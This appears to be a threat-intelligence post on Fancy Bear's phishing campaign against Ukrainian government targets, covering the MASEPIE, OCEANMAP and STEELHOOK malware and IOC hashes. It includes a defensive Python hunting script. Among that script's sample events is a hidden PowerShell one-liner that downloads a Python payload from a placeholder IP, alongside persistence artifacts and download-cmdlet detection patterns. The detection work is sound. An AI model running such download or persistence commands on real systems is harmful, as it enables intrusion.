Related Families: OCEANMAP, MASEPIE, STEELHOOK
Verticals Targeted: Government
Executive Summary
Fancy Bear was recently observed engaging in a phishing campaign targeting entities in Ukraine. In the campaign, the threat actors used three never-before-seen malware families: OCEANMAP, MASEPIE, and STEELHOOK.
Key Takeaways
- Fancy Bear was recently observed engaging in a phishing campaign targeting entities in Ukraine.
- In the campaign, the threat actors used three never-before-seen malware families: OCEANMAP, MASEPIE, and STEELHOOK.
- OCEANMAP is a C#-based backdoor used to execute commands via cmd.exe.
- MASEPIE is a Python tool used for uploading files and executing commands.
- STEELHOOK is a PowerShell script capable of stealing internet browser data and the DPAPI master key.
The Campaign
Fancy Bear was recently observed engaging in a phishing campaign targeting entities in Ukraine. In the campaign, the threat actors used three never-before-seen malware families: OCEANMAP, MASEPIE, and STEELHOOK. The objective of the campaign appears to be espionage. CERT-UA reported on this activity. A synopsis of the activity in English was provided by Security Affairs.
The attacks, which took place in December 2023, targeted government entities. The phishing emails used in the campaign attempted to trick the victim into clicking on an embedded link to view a document. When the victim clicked the link, they were redirected to a web resource that resulted in the download of an LNK file. Upon opening the LNK file, a PowerShell command downloads a decoy document and MASEPIE, delivered as a file named Client.py.
The Malware
MASEPIE
MASEPIE is a Python tool capable of uploading and downloading files and executing commands. It communicates with the C2 via encrypted traffic. The backdoor sets up a SysUpdate key in the registry to maintain persistence, placing an LNK file named SystemUpdate.lnk in the startup directory. Finally, MASEPIE is used to download and execute OPENSSH, STEELHOOK, and OCEANMAP.
OCEANMAP
OCEANMAP is a C#-based tool that acts as a backdoor. It executes commands using cmd.exe and uses IMAP as a control channel. Commands are base64-encoded and are stored in the Drafts folder of email mailboxes.
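The three behaviours described above (the LNK-launched PowerShell download of Client.py, MASEPIE's SysUpdate registry value and SystemUpdate.lnk startup entry, and OCEANMAP's IMAP control channel carrying base64-encoded drafts) can be turned into simple hunting rules. The Python below is an added example written for this page, not code from PolySwarm, CERT-UA or the malware authors; the Sysmon-style event shape, the field names, the assumption that SysUpdate lives under a Run key, the mail-client allow-list, and every path, SID and IP address in the sample events are constructed for illustration.

```python
"""Hunting rules for the MASEPIE / OCEANMAP behaviours described in the post.

Added example, not project code. Events are CONSTRUCTED samples in a
Sysmon-like shape (id 1 = process create, 3 = network connect,
11 = file create, 13 = registry value set); nothing here is real telemetry.
"""
import base64
import binascii
import re
from typing import Optional

# Constructed sample events (assumed field names; paths, SID and IPs are made up).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr http://198.51.100.7/Client.py -OutFile $env:TEMP\Client.py"'},
    {"id": 13,
     "target": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate",
     "details": r"C:\Users\u\AppData\Local\Temp\SystemUpdate.lnk"},
    {"id": 11, "image": r"C:\Users\u\AppData\Local\Programs\Python\python.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.lnk"},
    {"id": 3, "image": r"C:\Users\u\AppData\Local\Temp\updater.exe", "dport": 993, "dest": "203.0.113.4"},
    {"id": 3, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "dport": 993, "dest": "203.0.113.4"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe readme.txt"},
]

# PowerShell download primitives commonly seen in one-liners launched from LNK files.
DOWNLOAD_CMDLETS = re.compile(r"(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget)", re.I)
# Assumption: the SysUpdate value sits under a per-user Run/RunOnce key.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\SysUpdate$", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\SystemUpdate\.lnk$", re.I)
IMAP_PORTS = {143, 993}
# Processes expected to speak IMAP in this (constructed) environment; extend per site.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> Optional[str]:
    """Return a rule name when the event matches one of the described behaviours."""
    if ev["id"] == 1:  # LNK opened from Explorer -> PowerShell fetching a .py payload
        if (basename(ev["parent"]) == "explorer.exe"
                and basename(ev["image"]) in {"powershell.exe", "pwsh.exe"}
                and DOWNLOAD_CMDLETS.search(ev["cmdline"])
                and ".py" in ev["cmdline"].lower()):
            return "lnk_powershell_python_download"
    elif ev["id"] == 13 and RUN_KEY.search(ev["target"]):  # MASEPIE persistence value
        return "masepie_run_key"
    elif ev["id"] == 11 and STARTUP_LNK.search(ev["target"]):  # MASEPIE startup shortcut
        return "masepie_startup_lnk"
    elif ev["id"] == 3 and ev["dport"] in IMAP_PORTS and basename(ev["image"]) not in MAIL_CLIENTS:
        return "imap_from_non_mail_client"  # OCEANMAP-style IMAP control channel
    return None


def hunt(events) -> list:
    """(event id, rule) for every event that triggers a rule, in input order."""
    return [(ev["id"], rule) for ev in events if (rule := classify(ev))]


def decode_draft_command(body: str) -> Optional[str]:
    """Mailbox review helper: if a draft body is one base64 token that decodes to
    printable ASCII, return the decoded text, else None (ordinary drafts do not)."""
    token = body.strip()
    if not token or len(token) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


if __name__ == "__main__":
    for event_id, rule in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The IMAP rule is the noisy one: it only works after the site's legitimate mail clients are in the allow-list, and it is best paired with the mailbox check, since a draft whose entire body is a base64 token that decodes to a shell command is far more specific than a port number alone.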
STEELHOOK
STEELHOOK is a PowerShell script capable of stealing internet browser data, as well as the DPAPI master key.
Who is Fancy Bear?
Fancy Bear, also known as APT28, Pawnstorm, SnakeMackerel, Forest Blizzard, Strontium, Sednit, Sofacy, and Tsar Team, is a Russia-nexus APT group associated with Unit 26165 of the Russian intelligence entity known as the GRU. The group has been active since at least 2007 and targets government, military, and security entities.
IOCs
PolySwarm has multiple samples associated with this activity.
18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6
24fd571600dcc00bf2bb8577c7e4fd67275f7d19d852b909395bebcbb1274e04
19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc
593583b312bf48b7748f4372e6f4a560fd38e969399cf2a96798e2594a517bf4
You can use the following CLI command to search for these and other Fancy Bear samples in our portal:
$ polyswarm link list -t FancyBear